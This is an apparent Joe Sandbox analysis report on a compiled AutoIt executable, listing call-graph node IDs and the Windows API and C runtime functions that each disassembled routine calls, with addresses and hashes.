452a13 87191->87193 87195 452aa5 87192->87195 87196 452a3c 87192->87196 87194 413748 _free 46 API calls 87193->87194 87198 452a1c 87194->87198 87197 413748 _free 46 API calls 87195->87197 87758 44b1a9 87196->87758 87202 452aa3 87197->87202 87200 413748 _free 46 API calls 87198->87200 87203 452a25 87200->87203 87201 452a9d 87204 413748 _free 46 API calls 87201->87204 87202->87089 87203->87089 87204->87202 87206 431e64 87205->87206 87207 431e6a 87205->87207 87208 414a46 __fcloseall 82 API calls 87206->87208 87207->87090 87208->87207 87210 425de2 87209->87210 87214 40f6fc _wcslen 87209->87214 87210->87151 87211 40f710 WideCharToMultiByte 87212 40f756 87211->87212 87213 40f728 87211->87213 87212->87151 87215 4115d7 52 API calls 87213->87215 87214->87211 87216 40f735 WideCharToMultiByte 87215->87216 87216->87151 87218 40f85d setSBCS _strlen 87217->87218 87220 40f7ab 87218->87220 87265 414db8 87218->87265 87221 4149c2 87220->87221 87280 414904 87221->87280 87223 40f7e9 87223->87156 87224 40f5c0 87223->87224 87228 40f5cd _strcat __write_nolock _memmove 87224->87228 87225 414d04 __fread_nolock 61 API calls 87225->87228 87227 425d11 87229 4150d1 _fseek 81 API calls 87227->87229 87228->87225 87228->87227 87232 40f691 __tzset_nolock 87228->87232 87368 4150d1 87228->87368 87230 425d33 87229->87230 87231 414d04 __fread_nolock 61 API calls 87230->87231 87231->87232 87232->87158 87234 414a52 __read 87233->87234 87235 414a64 87234->87235 87236 414a79 87234->87236 87508 417f77 46 API calls __getptd_noexit 87235->87508 87239 415471 __lock_file 47 API calls 87236->87239 87244 414a74 __read 87236->87244 87238 414a69 87509 417f25 10 API calls wcstoxq 87238->87509 87241 414a92 87239->87241 87492 4149d9 87241->87492 87244->87163 87577 414c76 87246->87577 87248 414d1c 87249 44afef 87248->87249 87745 442c5a 87249->87745 87251 44b00d 87251->87165 87253 414fee __read 87252->87253 87254 414ffa 87253->87254 87255 41500f 87253->87255 87749 417f77 46 API calls __getptd_noexit 87254->87749 87257 
415471 __lock_file 47 API calls 87255->87257 87259 415017 87257->87259 87258 414fff 87750 417f25 10 API calls wcstoxq 87258->87750 87261 414e4e __ftell_nolock 51 API calls 87259->87261 87262 415024 87261->87262 87751 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87262->87751 87263 41500a __read 87263->87167 87266 414dd6 87265->87266 87267 414deb 87265->87267 87276 417f77 46 API calls __getptd_noexit 87266->87276 87267->87266 87269 414df2 87267->87269 87278 41b91b 79 API calls 12 library calls 87269->87278 87270 414ddb 87277 417f25 10 API calls wcstoxq 87270->87277 87273 414e18 87274 414de6 87273->87274 87279 418f98 77 API calls 7 library calls 87273->87279 87274->87218 87276->87270 87277->87274 87278->87273 87279->87274 87282 414910 __read 87280->87282 87281 414923 87336 417f77 46 API calls __getptd_noexit 87281->87336 87282->87281 87284 414951 87282->87284 87299 41d4d1 87284->87299 87285 414928 87337 417f25 10 API calls wcstoxq 87285->87337 87288 414956 87289 41496a 87288->87289 87290 41495d 87288->87290 87292 414992 87289->87292 87293 414972 87289->87293 87338 417f77 46 API calls __getptd_noexit 87290->87338 87316 41d218 87292->87316 87339 417f77 46 API calls __getptd_noexit 87293->87339 87294 414933 @_EH4_CallFilterFunc@8 __read 87294->87223 87300 41d4dd __read 87299->87300 87301 4182cb __lock 46 API calls 87300->87301 87314 41d4eb 87301->87314 87302 41d560 87341 41d5fb 87302->87341 87303 41d567 87305 416b04 __malloc_crt 46 API calls 87303->87305 87307 41d56e 87305->87307 87306 41d5f0 __read 87306->87288 87307->87302 87308 41d57c InitializeCriticalSectionAndSpinCount 87307->87308 87309 41d59c 87308->87309 87310 41d5af EnterCriticalSection 87308->87310 87313 413748 _free 46 API calls 87309->87313 87310->87302 87311 418209 __mtinitlocknum 46 API calls 87311->87314 87313->87302 87314->87302 87314->87303 87314->87311 87344 4154b2 47 API calls __lock 87314->87344 87345 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87314->87345 87317 41d23a 
87316->87317 87318 41d255 87317->87318 87330 41d26c __wopenfile 87317->87330 87350 417f77 46 API calls __getptd_noexit 87318->87350 87320 41d421 87323 41d47a 87320->87323 87324 41d48c 87320->87324 87321 41d25a 87351 417f25 10 API calls wcstoxq 87321->87351 87355 417f77 46 API calls __getptd_noexit 87323->87355 87347 422bf9 87324->87347 87327 41499d 87340 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87327->87340 87328 41d47f 87356 417f25 10 API calls wcstoxq 87328->87356 87330->87320 87330->87323 87352 41341f 58 API calls 2 library calls 87330->87352 87332 41d41a 87332->87320 87353 41341f 58 API calls 2 library calls 87332->87353 87334 41d439 87334->87320 87354 41341f 58 API calls 2 library calls 87334->87354 87336->87285 87337->87294 87338->87294 87339->87294 87340->87294 87346 4181f2 LeaveCriticalSection 87341->87346 87343 41d602 87343->87306 87344->87314 87345->87314 87346->87343 87357 422b35 87347->87357 87349 422c14 87349->87327 87350->87321 87351->87327 87352->87332 87353->87334 87354->87320 87355->87328 87356->87327 87358 422b41 __read 87357->87358 87359 422b54 87358->87359 87361 422b8a 87358->87361 87360 417f77 wcstoxq 46 API calls 87359->87360 87362 422b59 87360->87362 87364 422400 __tsopen_nolock 109 API calls 87361->87364 87363 417f25 wcstoxq 10 API calls 87362->87363 87367 422b63 __read 87363->87367 87365 422ba4 87364->87365 87366 422bcb __wsopen_helper LeaveCriticalSection 87365->87366 87366->87367 87367->87349 87370 4150dd __read 87368->87370 87369 4150e9 87399 417f77 46 API calls __getptd_noexit 87369->87399 87370->87369 87371 41510f 87370->87371 87381 415471 87371->87381 87374 4150ee 87400 417f25 10 API calls wcstoxq 87374->87400 87380 4150f9 __read 87380->87228 87382 415483 87381->87382 87383 4154a5 EnterCriticalSection 87381->87383 87382->87383 87384 41548b 87382->87384 87385 415117 87383->87385 87386 4182cb __lock 46 API calls 87384->87386 87387 415047 87385->87387 87386->87385 87388 415067 87387->87388 87389 415057 87387->87389 87394 
415079 87388->87394 87402 414e4e 87388->87402 87457 417f77 46 API calls __getptd_noexit 87389->87457 87393 41505c 87401 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87393->87401 87419 41443c 87394->87419 87397 4150b9 87432 41e1f4 87397->87432 87399->87374 87400->87380 87401->87380 87403 414e61 87402->87403 87404 414e79 87402->87404 87458 417f77 46 API calls __getptd_noexit 87403->87458 87405 414139 __fflush_nolock 46 API calls 87404->87405 87407 414e80 87405->87407 87410 41e1f4 __write 51 API calls 87407->87410 87408 414e66 87459 417f25 10 API calls wcstoxq 87408->87459 87411 414e97 87410->87411 87412 414f09 87411->87412 87414 414ec9 87411->87414 87418 414e71 87411->87418 87460 417f77 46 API calls __getptd_noexit 87412->87460 87415 41e1f4 __write 51 API calls 87414->87415 87414->87418 87416 414f64 87415->87416 87417 41e1f4 __write 51 API calls 87416->87417 87416->87418 87417->87418 87418->87394 87420 414455 87419->87420 87421 414477 87419->87421 87420->87421 87422 414139 __fflush_nolock 46 API calls 87420->87422 87425 414139 87421->87425 87423 414470 87422->87423 87461 41b7b2 77 API calls 5 library calls 87423->87461 87426 414145 87425->87426 87427 41415a 87425->87427 87462 417f77 46 API calls __getptd_noexit 87426->87462 87427->87397 87429 41414a 87463 417f25 10 API calls wcstoxq 87429->87463 87431 414155 87431->87397 87433 41e200 __read 87432->87433 87434 41e223 87433->87434 87435 41e208 87433->87435 87437 41e22f 87434->87437 87440 41e269 87434->87440 87484 417f8a 46 API calls __getptd_noexit 87435->87484 87486 417f8a 46 API calls __getptd_noexit 87437->87486 87438 41e20d 87485 417f77 46 API calls __getptd_noexit 87438->87485 87464 41ae56 87440->87464 87442 41e234 87487 417f77 46 API calls __getptd_noexit 87442->87487 87445 41e26f 87447 41e291 87445->87447 87448 41e27d 87445->87448 87446 41e23c 87488 417f25 10 API calls wcstoxq 87446->87488 87489 417f77 46 API calls __getptd_noexit 87447->87489 87474 41e17f 87448->87474 87450 41e215 __read 87450->87393 
87453 41e289 87491 41e2c0 LeaveCriticalSection __unlock_fhandle 87453->87491 87454 41e296 87490 417f8a 46 API calls __getptd_noexit 87454->87490 87457->87393 87458->87408 87459->87418 87460->87418 87461->87421 87462->87429 87463->87431 87465 41ae62 __read 87464->87465 87466 41aebc 87465->87466 87467 4182cb __lock 46 API calls 87465->87467 87468 41aec1 EnterCriticalSection 87466->87468 87469 41aede __read 87466->87469 87470 41ae8e 87467->87470 87468->87469 87469->87445 87471 41aeaa 87470->87471 87472 41ae97 InitializeCriticalSectionAndSpinCount 87470->87472 87473 41aeec ___lock_fhandle LeaveCriticalSection 87471->87473 87472->87471 87473->87466 87475 41aded __close_nolock 46 API calls 87474->87475 87476 41e18e 87475->87476 87477 41e1a4 SetFilePointer 87476->87477 87478 41e194 87476->87478 87480 41e1bb GetLastError 87477->87480 87481 41e1c3 87477->87481 87479 417f77 wcstoxq 46 API calls 87478->87479 87482 41e199 87479->87482 87480->87481 87481->87482 87483 417f9d __dosmaperr 46 API calls 87481->87483 87482->87453 87483->87482 87484->87438 87485->87450 87486->87442 87487->87446 87488->87450 87489->87454 87490->87453 87491->87450 87493 4149ea 87492->87493 87494 4149fe 87492->87494 87538 417f77 46 API calls __getptd_noexit 87493->87538 87497 4149fa 87494->87497 87498 41443c __flush 77 API calls 87494->87498 87496 4149ef 87539 417f25 10 API calls wcstoxq 87496->87539 87510 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87497->87510 87500 414a0a 87498->87500 87511 41d8c2 87500->87511 87503 414139 __fflush_nolock 46 API calls 87504 414a18 87503->87504 87515 41d7fe 87504->87515 87506 414a1e 87506->87497 87507 413748 _free 46 API calls 87506->87507 87507->87497 87508->87238 87509->87244 87510->87244 87512 414a12 87511->87512 87513 41d8d2 87511->87513 87512->87503 87513->87512 87514 413748 _free 46 API calls 87513->87514 87514->87512 87516 41d80a __read 87515->87516 87517 41d812 87516->87517 87518 41d82d 87516->87518 87555 417f8a 46 API calls __getptd_noexit 
87517->87555 87519 41d839 87518->87519 87524 41d873 87518->87524 87557 417f8a 46 API calls __getptd_noexit 87519->87557 87522 41d817 87556 417f77 46 API calls __getptd_noexit 87522->87556 87523 41d83e 87558 417f77 46 API calls __getptd_noexit 87523->87558 87527 41ae56 ___lock_fhandle 48 API calls 87524->87527 87529 41d879 87527->87529 87528 41d846 87559 417f25 10 API calls wcstoxq 87528->87559 87531 41d893 87529->87531 87532 41d887 87529->87532 87560 417f77 46 API calls __getptd_noexit 87531->87560 87540 41d762 87532->87540 87534 41d81f __read 87534->87506 87536 41d88d 87561 41d8ba LeaveCriticalSection __unlock_fhandle 87536->87561 87538->87496 87539->87497 87562 41aded 87540->87562 87542 41d7c8 87575 41ad67 47 API calls 2 library calls 87542->87575 87544 41d772 87544->87542 87546 41aded __close_nolock 46 API calls 87544->87546 87554 41d7a6 87544->87554 87545 41d7d0 87551 41d7f2 87545->87551 87576 417f9d 46 API calls 3 library calls 87545->87576 87548 41d79d 87546->87548 87547 41aded __close_nolock 46 API calls 87549 41d7b2 CloseHandle 87547->87549 87552 41aded __close_nolock 46 API calls 87548->87552 87549->87542 87553 41d7be GetLastError 87549->87553 87551->87536 87552->87554 87553->87542 87554->87542 87554->87547 87555->87522 87556->87534 87557->87523 87558->87528 87559->87534 87560->87536 87561->87534 87563 41adfa 87562->87563 87565 41ae12 87562->87565 87564 417f8a __read 46 API calls 87563->87564 87567 41adff 87564->87567 87566 417f8a __read 46 API calls 87565->87566 87569 41ae51 87565->87569 87568 41ae23 87566->87568 87570 417f77 wcstoxq 46 API calls 87567->87570 87571 417f77 wcstoxq 46 API calls 87568->87571 87569->87544 87572 41ae07 87570->87572 87573 41ae2b 87571->87573 87572->87544 87574 417f25 wcstoxq 10 API calls 87573->87574 87574->87572 87575->87545 87576->87551 87578 414c82 __read 87577->87578 87579 414cc3 87578->87579 87580 414c96 setSBCS 87578->87580 87581 414cbb __read 87578->87581 87582 415471 __lock_file 47 API calls 87579->87582 87604 417f77 46 
API calls __getptd_noexit 87580->87604 87581->87248 87583 414ccb 87582->87583 87590 414aba 87583->87590 87585 414cb0 87605 417f25 10 API calls wcstoxq 87585->87605 87594 414ad8 setSBCS 87590->87594 87596 414af2 87590->87596 87591 414ae2 87657 417f77 46 API calls __getptd_noexit 87591->87657 87593 414ae7 87658 417f25 10 API calls wcstoxq 87593->87658 87594->87591 87594->87596 87601 414b2d 87594->87601 87606 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87596->87606 87598 414c38 setSBCS 87660 417f77 46 API calls __getptd_noexit 87598->87660 87599 414139 __fflush_nolock 46 API calls 87599->87601 87601->87596 87601->87598 87601->87599 87607 41dfcc 87601->87607 87637 41d8f3 87601->87637 87659 41e0c2 46 API calls 3 library calls 87601->87659 87604->87585 87605->87581 87606->87581 87608 41dfd8 __read 87607->87608 87609 41dfe0 87608->87609 87610 41dffb 87608->87610 87730 417f8a 46 API calls __getptd_noexit 87609->87730 87612 41e007 87610->87612 87615 41e041 87610->87615 87732 417f8a 46 API calls __getptd_noexit 87612->87732 87613 41dfe5 87731 417f77 46 API calls __getptd_noexit 87613->87731 87619 41e063 87615->87619 87620 41e04e 87615->87620 87617 41e00c 87733 417f77 46 API calls __getptd_noexit 87617->87733 87624 41ae56 ___lock_fhandle 48 API calls 87619->87624 87735 417f8a 46 API calls __getptd_noexit 87620->87735 87621 41dfed __read 87621->87601 87622 41e014 87734 417f25 10 API calls wcstoxq 87622->87734 87626 41e069 87624->87626 87625 41e053 87736 417f77 46 API calls __getptd_noexit 87625->87736 87629 41e077 87626->87629 87630 41e08b 87626->87630 87661 41da15 87629->87661 87737 417f77 46 API calls __getptd_noexit 87630->87737 87633 41e083 87739 41e0ba LeaveCriticalSection __unlock_fhandle 87633->87739 87634 41e090 87738 417f8a 46 API calls __getptd_noexit 87634->87738 87638 41d900 87637->87638 87642 41d915 87637->87642 87743 417f77 46 API calls __getptd_noexit 87638->87743 87640 41d905 87744 417f25 10 API calls wcstoxq 87640->87744 87643 41d94a 87642->87643 
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 004096C1
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • _memmove.LIBCMT ref: 0040970C
                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                              • _memmove.LIBCMT ref: 00409D96
                                                                                              • _memmove.LIBCMT ref: 0040A6C4
                                                                                              • _memmove.LIBCMT ref: 004297E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2383988440-0
                                                                                              • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                              • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                              • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                              • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                              • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                              • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                              • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                              Strings
                                                                                              • runas, xrefs: 0042E2AD, 0042E2DC
                                                                                              • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                              • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                              • API String ID: 2495805114-3383388033
                                                                                              • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                              • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                              • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                              • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                              • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                              • String ID: 0SH$Wu
                                                                                              • API String ID: 3363477735-1135818761
                                                                                              • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                              • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                              • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                              • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: IsThemeActive$uxtheme.dll
                                                                                              • API String ID: 2574300362-3542929980
                                                                                              • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                              • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                              • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                              • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                              APIs
                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                              • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeInfoLibraryParametersSystem
                                                                                              • String ID: Wu
                                                                                              • API String ID: 3403648963-4083010176
                                                                                              • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                              • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                              • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                              • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                              • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                              • TranslateMessage.USER32(?), ref: 00409556
                                                                                              • DispatchMessageW.USER32(?), ref: 00409561
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Peek$DispatchSleepTranslate
                                                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                              • API String ID: 1762048999-758534266
                                                                                              • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                              • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                              • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                              • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
